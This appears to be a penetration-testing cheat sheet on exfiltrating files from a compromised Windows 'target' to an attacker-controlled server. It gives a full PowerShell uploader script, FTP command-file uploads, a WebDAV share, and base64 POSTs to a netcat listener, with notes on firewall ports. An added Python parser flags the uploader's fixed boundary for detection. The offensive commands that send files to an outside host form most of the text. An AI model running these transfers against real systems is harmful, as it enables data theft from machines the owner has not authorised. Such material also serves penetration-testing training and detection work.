Note
- Some operations may be blocked by Windows Firewall policies. Outbound traffic using the HTTP (TCP/80) and HTTPS (TCP/443) protocols is usually disallowed.
- The default ports used by the services below might be blocked or filtered by IDS or firewall policies.
Note
- Server: basic commands to set up a running server.
- Target: these operations are done on the victim machine.
- Interactive: we are logged into the remote machine via RDP, SSH, etc.
- Non Interactive: commands run in their own subshell, and that shell is not interactive; it opens to execute and closes immediately.
Python Web Server
- Server HTTP/S
- Target
- PowerShell Script
:: Requires the [uploadserver] package on the server and the [PSUpload.ps1] PowerShell script on the target
:: HTTP Server (listens on TCP/8000 by default)
python3 -m uploadserver
:: HTTPS Server
:: Create a self-signed certificate (private key and certificate are both written to server.pem)
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
:: Start the web server from a separate directory so server.pem (which holds the private key) is not served; binding to TCP/443 requires root
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /<OPENSSL [server.pem] Location>
# Import the PowerShell script on the target
Import-Module .\PSUpload.ps1
# Upload the file to the upload server
# Default upload endpoint: [/upload]
Invoke-FileUpload -Uri http://<IP>/upload -File C:\<File Name>
<#
PowerShell script to upload files using the uploadserver module
GitHub: https://github.com/Densaugeo/uploadserver
To run the server on your Linux machine:
pip3 install uploadserver
python3 -m uploadserver
Example PS:
Invoke-FileUpload -File C:\Users\plaintext\Desktop\20200717080254_BloodHound.zip -Uri http://192.168.49.128:8000/upload
References: https://gist.github.com/arichika/91a8b1f60c87512401e320a614099283
#>
function Invoke-FileUpload {
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]$File,
        [Parameter(Position = 1, Mandatory = $True)]
        [String]$Uri
    )
    $FileToUpload = Get-ChildItem -File "$File"
    # UTF-8 without BOM, so no stray bytes precede the first boundary
    $UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
    # Fixed multipart boundary (identical on every upload)
    $boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
    $tempFile = New-TemporaryFile
    Remove-Item $tempFile -Force -ErrorAction Ignore
    # Part header; the field name "files" is what uploadserver expects
    $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
    $fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
    $sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
    $sw.Close()
    # Append the raw file bytes
    $fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
    $bw = New-Object System.IO.BinaryWriter($fs)
    $fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
    $bw.Write($fileBinary)
    $bw.Close()
    # Closing boundary
    $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
    $sw.Write("`r`n--$boundary--`r`n")
    $sw.Close()
    Invoke-RestMethod -Method POST -Uri $Uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile
    # MD5 of the local file, to compare with the copy received on the server
    $FileHash = Get-FileHash -Path "$File" -Algorithm MD5
    Write-Host "[+] File Uploaded: " $FileToUpload.FullName
    Write-Host "[+] FileHash: " $FileHash.Hash
}
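The script above always uses the same multipart boundary and prints the MD5 of what it sent. The following Python example is added here and is not code from the page or from the uploadserver/PSUpload projects: it rebuilds the request bytes exactly as the script writes them (so detection logic can be exercised on constructed traffic) and parses a captured request back out, flagging the hard-coded boundary as a static indicator and hashing each extracted file part so it can be matched against the client-side Get-FileHash value. The host name, target path, file name and file contents are constructed sample values.

```python
import hashlib
import re

# Boundary hard-coded in PSUpload.ps1 above. It is identical on every upload,
# so it doubles as a static signature for that uploader in proxy or IDS captures.
PSUPLOAD_BOUNDARY = b"----BCA246E0-E2CF-48ED-AACE-58B35D68B513"

def build_psupload_request(target, filename, data, boundary=PSUPLOAD_BOUNDARY):
    """Rebuild the bytes PSUpload.ps1 writes (part header, raw file, closing
    boundary) so detection logic can be exercised on constructed traffic."""
    body = (b"--" + boundary + b"\r\nContent-Disposition: form-data;name=\"files\";filename=\""
            + filename.encode() + b"\"\r\n\r\n" + data + b"\r\n--" + boundary + b"--\r\n")
    head = (b"POST " + target.encode() + b" HTTP/1.1\r\nHost: constructed.example\r\n"  # constructed host
            + b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            + b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n")
    return head + body

def parse_multipart_upload(raw_request):
    """Inspect one captured HTTP request. Reports the target path, whether it is a
    multipart upload, whether the boundary is the PSUpload.ps1 constant, and for
    each file part its name, size and MD5 (comparable with the Get-FileHash
    value the script prints on the client)."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    tokens = head.split(b"\r\n", 1)[0].split(b" ") + [b"", b""]
    method, target = tokens[0], tokens[1]
    ct = re.search(rb"Content-Type:\s*multipart/form-data;\s*boundary=\"?([^\r\n;\"]+)", head, re.I)
    result = {"target": target.decode("ascii", "replace"), "is_upload": False,
              "known_psupload_boundary": False, "files": []}
    if method != b"POST" or ct is None:
        return result
    boundary = ct.group(1)
    result["is_upload"] = True
    result["known_psupload_boundary"] = boundary == PSUPLOAD_BOUNDARY
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):            # "--boundary--": end of the body
            break
        # part[2:] drops the CRLF after the delimiter; part headers end at the first blank
        # line; the data ends before the CRLF preceding the next delimiter (data may contain CRLFs)
        part_head, _, part_body = part[2:].partition(b"\r\n\r\n")
        fn = re.search(rb'filename="([^"]*)"', part_head)
        if fn is None:                        # ordinary form field, not a file
            continue
        data = part_body[:-2] if part_body.endswith(b"\r\n") else part_body
        result["files"].append({"filename": fn.group(1).decode("utf-8", "replace"),
                                "size": len(data), "md5": hashlib.md5(data).hexdigest()})
    return result

if __name__ == "__main__":
    sample = build_psupload_request("/upload", "sample.zip", b"abc")   # constructed sample
    print(parse_multipart_upload(sample))
```

The same parser works on any multipart/form-data POST, so a non-matching boundary with a file part still reports the upload, only without the PSUpload match.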
FTP
- Server
- Interactive
- Non Interactive
:: Requires the [pyftpdlib] package
:: Start the server; --write grants upload permission (pyftpdlib is read-only by default), and binding to TCP/21 requires root
python3 -m pyftpdlib --port 21 --write
:: Interactive shell
:: Access the server [USER: anonymous PASSWORD: anonymous] and upload the file with PUT
ftp ➜ open ➜ <IP> ➜ PUT "<File Name>"
:: Non-interactive shell (Target)
:: Write the FTP command file
echo open <IP> > FTP.txt
echo USER anonymous >> FTP.txt
echo anonymous >> FTP.txt
echo PUT FILE.exe >> FTP.txt
echo bye >> FTP.txt
:: Upload the file (-n disables auto-login so USER in the script is used, -s runs the command file)
ftp -v -n -s:FTP.txt
# PowerShell upload method: first argument is the remote URI, second is the local file to send
(New-Object Net.WebClient).UploadFile('ftp://<IP>/<File Name>', 'C:\<Local File>')
WebDav
- Server
- Target
:: Requires the [wsgidav] and [cheroot] packages
:: Anonymous access to /tmp, so anything placed there is readable by anyone who can reach TCP/80
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Note
DavWWWRoot is a special keyword recognized by the Windows shell. No such folder exists on your WebDAV server.
The keyword tells the Mini-Redirector driver, which handles WebDAV requests, that you are connecting to the root of the WebDAV server.
**We can avoid using this keyword if we specify a folder that exists on our server when connecting to the server.**
:: List WebDAV share contents
dir \\<IP>\DavWWWRoot
:: Upload files
copy C:\<File Name> \\<IP>\DavWWWRoot\
copy C:\<File Name> \\<IP>\<Share Folder>\
PSH [BASE64]
# PowerShell Base64 encode on the target (-Encoding Byte is Windows PowerShell 5.1; PowerShell 7 uses -AsByteStream instead)
[Convert]::ToBase64String((Get-Content -Path "C:\<File Name>" -Encoding Byte))
# Record the file hash so the decoded copy can be verified (compare with md5sum on the receiving side)
Get-FileHash "C:\<File Name>" -Algorithm MD5
# Decode Base64 on the receiving Linux machine
echo "<BASE64>" | base64 -d > <Output>
# [Invoke-WebRequest] method; [Invoke-RestMethod] also works
$b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\<File Name>' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:<Netcat Port>/ -Method POST -Body $b64
# Catch the Base64 data with [Netcat] on the receiving machine (the request body is shown after the headers)
nc -nvlp <PORT>
# Decode Base64 (base64 -w only affects encoding output, so plain -d is enough)
echo "<BASE64>" | base64 -d > <Output>
SCP
:: Copy a local file to the remote system
scp -P 22 "<File Name>" <Username>@<IP>:/<Output>